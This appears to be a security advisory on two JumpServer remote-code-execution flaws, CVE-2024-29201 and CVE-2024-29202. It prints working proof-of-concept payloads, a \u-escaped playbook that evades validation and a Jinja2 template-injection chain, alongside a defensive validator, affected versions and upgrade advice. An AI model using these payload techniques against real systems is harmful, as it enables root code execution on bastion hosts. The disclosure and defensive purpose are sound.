CVE-2024-29201 & CVE-2024-29202 Flaws Expose JumpServer Users to RCE Attacks

JumpServer, a popular open-source bastion host system, has recently been found to contain two critical vulnerabilities (CVE-2024-29201 and CVE-2024-29202) that could allow attackers to execute arbitrary code remotely. These vulnerabilities pose a severe risk to organizations that rely on JumpServer for their security infrastructure.

CVE-2024-29201 and CVE-2024-29202

Understanding the Vulnerabilities

  • CVE-2024-29201: This vulnerability lies within JumpServer’s Ansible playbook validation process. Attackers can bypass input validation mechanisms and inject malicious code into Ansible playbooks, which then executes within JumpServer’s Celery container with root privileges.

The exploitation process was disturbingly straightforward:

  1. The attacker constructs a malicious playbook template within the “Job > Template” section of the Workbench, like the following playbook (JSON, which is valid YAML):
     [{
       "name": "RCE playbook",
       "hosts": "all",
       "tasks": [
         {
           "name": "this runs in Celery container",
           "shell": "id > /tmp/pwnd",
           "\u0064elegate_to": "localhost"
         }
       ],
       "vars": {
         "ansible_\u0063onnection": "local"
       }
     }]
  2. The attacker creates a job with this playbook and adds at least one asset to run the job.
  3. The attacker successfully creates the file /tmp/pwnd in the Celery container.
  • CVE-2024-29202: This vulnerability stems from a Jinja2 template injection flaw in JumpServer’s Ansible module. By crafting malicious Ansible Playbook templates, attackers can execute arbitrary code within the Celery container.

The simplicity of the attack mechanism underscored the vulnerability’s severity:

  1. The attacker constructs a malicious playbook template within the “Job > Template” section of the Workbench, like the following YAML code:
     - name: |
         {% for x in ().__class__.__base__.__subclasses__() %}
         {% if "warning" in x.__name__ %}
         {{
         x()._module.__builtins__["__import__"]("os").system("id > /tmp/pwnd")
         }}
         {%endif%}
         {%endfor%}
  2. The attacker creates a job by running the malicious playbook template within the “Job > Job list” section of the Workbench.
  3. The attacker successfully creates the file /tmp/pwnd in the Celery container.
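As an added illustration (not JumpServer's own code), the following validator checks the playbook as a parsed structure rather than as raw text, so the \u escapes in the first payload no longer hide the delegate_to and ansible_connection keys, and it rejects Jinja2 markers in any string field, which catches the name-field injection of the second payload. The key names it inspects, the local-host list and the naive text check it is contrasted with are assumptions made for this example.

```python
import json
import re

# Values that make a task run on the JumpServer worker (the Celery container)
# instead of on the managed asset: the pattern in the CVE-2024-29201 payload.
LOCAL_HOSTS = {"localhost", "127.0.0.1", "::1"}
# Jinja2 expression/block/comment markers: the CVE-2024-29202 pattern.
JINJA_MARKER = re.compile(r"\{\{|\{%|\{#")

def naive_text_check(raw_text):
    """Hypothetical blocklist on the raw text; True means 'looks clean'.
    JSON \\uXXXX escapes in key names slip straight past a check like this."""
    return not any(w in raw_text for w in ("delegate_to", "ansible_connection"))

def _walk(node, path=""):
    """Yield (path, key, value) for every mapping entry, recursively."""
    if isinstance(node, dict):
        for key, value in node.items():
            yield path, key, value
            yield from _walk(value, f"{path}/{key}")
    elif isinstance(node, list):
        for i, item in enumerate(node):
            yield from _walk(item, f"{path}[{i}]")

def find_violations(playbook):
    """Findings for a *parsed* playbook (a list of plays). After json.loads,
    "\\u0064elegate_to" is simply the key delegate_to, so it cannot hide."""
    findings = []
    for path, key, value in _walk(playbook):
        val = str(value).strip().lower()
        if key in ("delegate_to", "hosts") and val in LOCAL_HOSTS:
            findings.append(f"{path}: {key}={value!r} targets the worker itself")
        if key in ("connection", "ansible_connection") and val == "local":
            findings.append(f"{path}: {key}={value!r} forces a local connection")
        if isinstance(value, str) and JINJA_MARKER.search(value):
            findings.append(f"{path}: {key} contains a Jinja2 template marker")
    return findings

def check_json_playbook(raw_text):
    # Parse first, then validate the structure, never the text.
    return find_violations(json.loads(raw_text))

# Constructed sample: the escaped JSON playbook from the CVE-2024-29201 write-up.
ESCAPED_PLAYBOOK = r'''[{"name": "RCE playbook", "hosts": "all",
  "tasks": [{"name": "t", "shell": "id > /tmp/pwnd", "\u0064elegate_to": "localhost"}],
  "vars": {"ansible_\u0063onnection": "local"}}]'''
# Constructed sample: a play name carrying a Jinja2 block (CVE-2024-29202 pattern).
TEMPLATED_PLAYBOOK = [{"name": "{% for x in ().__class__.__base__.__subclasses__() %}"
                               "...{% endfor %}", "hosts": "all", "tasks": []}]
```

naive_text_check(ESCAPED_PLAYBOOK) returns True (bypassed), while check_json_playbook(ESCAPED_PLAYBOOK) reports the delegate_to and ansible_connection entries and find_violations(TEMPLATED_PLAYBOOK) reports the templated name.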

Potential Impact

Both vulnerabilities carry a “Critical” CVSS score of 10. Successful exploitation could allow attackers to:

  • Steal sensitive data from connected hosts
  • Manipulate databases that JumpServer has access to
  • Potentially gain further access to the organization’s network

Affected Versions

The vulnerabilities impact JumpServer versions v3.0.0 through v3.10.6.

Recommendations

JumpServer users are strongly advised to take the following actions:

  • Upgrade to v3.10.7: Patched versions are available and should be applied immediately.
  • Temporary Workaround: If upgrading immediately is not possible, consider disabling JumpServer’s Job Center feature as a temporary mitigation.